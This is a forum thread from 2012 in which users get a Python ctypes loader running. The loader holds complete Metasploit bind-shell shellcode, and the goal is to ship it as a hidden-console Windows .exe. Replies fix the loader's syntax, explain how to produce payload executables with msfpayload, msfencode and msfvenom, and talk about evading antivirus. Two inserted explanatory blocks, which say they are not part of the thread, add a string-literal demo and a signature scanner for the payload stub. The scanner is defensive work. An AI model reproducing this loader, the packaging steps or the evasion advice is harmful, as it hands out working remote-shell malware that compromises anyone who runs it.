bobbyb1980 (posted May 28, 2012; edited May 28, 2012 by bobbyb1980):

Hello hak5, I am having an issue getting C shellcode to compile from within a python script. What I am trying to do is use pyinstaller to make an .exe out of a python script.

    from ctypes import *

    shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
    "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
    "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
    "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
    "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
    "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
    "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
    "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

    memorywithshell = create_string_buffer(shellcode, len(shellcode))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()

The above is the script I want to create a .exe out of. The shellcode is in C and it was generated via the following command and pasted into the script.
    ./msfpayload windows/shell_bind_tcp C

Now when I try to build an .exe out of it using pyinstaller, I issue the following:

    $ python Configure.py
    .... *completes successfully*
    $ python Makespec.py --onefile --noconsole pyshell.py
    wrote /home/pyinstaller-1.5.1/pyshell/pyshell.spec
    now run Build.py to build the executable
    $ python Build.py pyshell/pyshell.spec
    checking Analysis
    building Analysis because outAnalysis0.toc non existent
    running Analysis outAnalysis0.toc
    Analyzing: support/_mountzlib.py
    Analyzing: support/useUnicode.py
    Analyzing: pyshell.py
    Traceback (most recent call last):
      File "Build.py", line 1494, in <module>
        main(args[0], configfilename=opts.configfile)
      File "Build.py", line 1472, in main
        build(specfile)
      File "Build.py", line 1429, in build
        execfile(spec)
      File "pyshell/pyshell.spec", line 3, in <module>
        pathex=['/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1'])
      File "Build.py", line 347, in __init__
        self.__postinit__()
      File "Build.py", line 298, in __postinit__
        self.assemble()
      File "Build.py", line 416, in assemble
        analyzer.analyze_script(script)
      File "/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1/mf.py", line 565, in analyze_script
        co = compile(string.replace(stuff, "\r\n", "\n"), fnm, 'exec')
    ValueError: invalid \x escape

It appears that the script is being run and python is literally interpreting the \x as an escape, and I want it to read it as a regular string without paying any mind to the contents. Presumably it will go on to compile it and give me the .exe, and it would be Windows ready. I also tried playing with the syntax of the shellcode, removing the ' and " characters, to no avail. Anyone know what's going on here?
int0x80 (posted May 29, 2012):

Try this:

    shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
    "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
    "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
    "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
    "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
    "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
    "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
    "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
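Why the parentheses matter, as an added illustration that is not part of the thread: Python joins adjacent string literals only inside one expression, so without the parentheses the assignment binds just the first line and every following line becomes a separate, discarded statement; a literal that is cut off mid-escape (for example a `\x` followed by a single hex digit) is rejected by the compiler outright, which is the "invalid \x escape" the build log shows. The chunks below are constructed placeholders, not the payload bytes from the post.

```python
import ast

# Constructed sample chunks standing in for the payload lines in the thread:
# three adjacent string literals, each on its own line.
CHUNKS = [r'"\x41\x42\x43"', r'"\x44\x45"', r'"\x46"']


def build_source(chunks, parenthesized):
    """Assemble 'shellcode = ...' from the chunks, with or without the
    parentheses that int0x80's answer adds."""
    body = "\n".join(chunks)
    if parenthesized:
        return "shellcode = (\n" + body + "\n)\n"
    return "shellcode = " + body + "\n"


def compile_error(source):
    """Return the compiler's complaint for a bad literal, or None if it compiles.
    Python 2 raised ValueError('invalid \\x escape') as in the thread's traceback;
    Python 3 raises SyntaxError for the same truncated escape."""
    try:
        compile(source, "<pyshell>", "exec")
    except (SyntaxError, ValueError) as exc:
        return str(exc)
    return None


def bound_length(source):
    """Run the assignment and report how many characters 'shellcode' holds."""
    namespace = {}
    exec(compile(source, "<pyshell>", "exec"), namespace)
    return len(namespace["shellcode"])


def literal_count(source):
    """Count top-level statements: without parentheses each extra line is a
    separate expression statement, not part of the assignment."""
    return len(ast.parse(source).body)


if __name__ == "__main__":
    loose = build_source(CHUNKS, parenthesized=False)
    grouped = build_source(CHUNKS, parenthesized=True)
    print("without parentheses:", literal_count(loose), "statements,",
          bound_length(loose), "chars bound")
    print("with parentheses:   ", literal_count(grouped), "statements,",
          bound_length(grouped), "chars bound")
    print("truncated escape:", compile_error('shellcode = "\\x4"\n'))
```

Run as a script it reports 3 statements / 3 chars for the loose form and 1 statement / 6 chars for the parenthesized form. A related catch when moving such a script to Python 3: `create_string_buffer` needs a `bytes` literal (`b"..."`), since a plain `"\xfc"` is a one-character `str` there.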
bobbyb1980 (posted May 29, 2012; edited May 29, 2012 by bobbyb1980):

That did the trick int0x, thanks a lot for your help.
bobbyb1980 (posted May 29, 2012):

Just out of curiosity int0x, does your payload actually work using this method? My payload for a windows/shell_reverse_tcp on port 2020 doesn't seem to want to work on a Windows XP box.
int0x80 (posted May 29, 2012):

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).
Mr-Protocol (posted May 29, 2012):

Tons of info here :P http://www.offensive-security.com/metasploit-unleashed/Msfvenom

msfvenom is just msfpayload + msfencode in the same tool. I tend to use msfpayload and msfencode independently instead of msfvenom, but I'd figure it wouldn't matter too much.
bobbyb1980 (posted May 30, 2012):

> I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom, i.e. msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti-virus scanners. I also tried msfvenom with various iteration combos w/no luck. I think most of the AVs are going to detect msfencoded data. Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs: http://projectshellcode.com/?q=node/12
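On the point that scanners tend to flag Metasploit output: the reason is that the payload's first bytes are a fixed API-hashing prologue, and the 15 bytes that open the shellcode quoted in this thread (fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30) are exactly that stub. The scanner below is an added example written for this thread, not anything from the posts or from the Metasploit project; it shows how a byte signature with one wildcard catches that prologue in a buffer. The assumption that only the second byte of the rel32 call displacement varies between payloads is mine, and all the sample buffers are constructed.

```python
import re

# Leading bytes of the x86 Windows payload shown in the thread: the Metasploit
# API-hashing stub (cld / call / pushad / mov ebp,esp / xor edx,edx /
# mov edx,fs:[edx+0x30]). Assumption: the low byte of the call displacement
# (0x89 here) is the only part that changes between payloads, so it is the
# one wildcard in the YARA-style hex pattern.
MSF_STUB_HEX = "fc e8 ?? 00 00 00 60 89 e5 31 d2 64 8b 52 30"


def hex_pattern_to_regex(pattern):
    """Turn a YARA-style hex string ('??' = any single byte) into a bytes regex."""
    parts = []
    for tok in pattern.split():
        parts.append(b"." if tok == "??" else re.escape(bytes.fromhex(tok)))
    # DOTALL so the wildcard also matches a 0x0a byte.
    return re.compile(b"".join(parts), re.DOTALL)


MSF_STUB = hex_pattern_to_regex(MSF_STUB_HEX)


def find_msf_stub(buf):
    """Return every offset at which the stub pattern occurs in buf."""
    return [m.start() for m in MSF_STUB.finditer(buf)]


# Constructed samples: the stub from the thread with padding around it, a
# variant with a different call displacement, and a buffer with no stub.
STUB_FROM_THREAD = bytes.fromhex("fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30")
SAMPLE = b"\x90" * 8 + STUB_FROM_THREAD + b"\x00" * 8
VARIANT = STUB_FROM_THREAD[:2] + b"\x82" + STUB_FROM_THREAD[3:]
CLEAN = b"MZ\x90\x00" + bytes(range(32))


if __name__ == "__main__":
    for name, buf in (("SAMPLE", SAMPLE), ("VARIANT", VARIANT), ("CLEAN", CLEAN)):
        print(name, "->", find_msf_stub(buf))
```

This is the whole idea behind a static signature: the encoders change the body of the payload, but anything the encoder leaves as plain, unchanged bytes (or any decoder stub that is itself constant) is enough for a pattern like this to fire, which is why re-encoding with more iterations on its own rarely changes the verdict.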
int0x80 (posted May 30, 2012):

Actually I've had good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the opcodes in the column to the left of the instructions.
bobbyb1980 (posted May 30, 2012):

Starting to see it's not so bad, pretty awesome too : )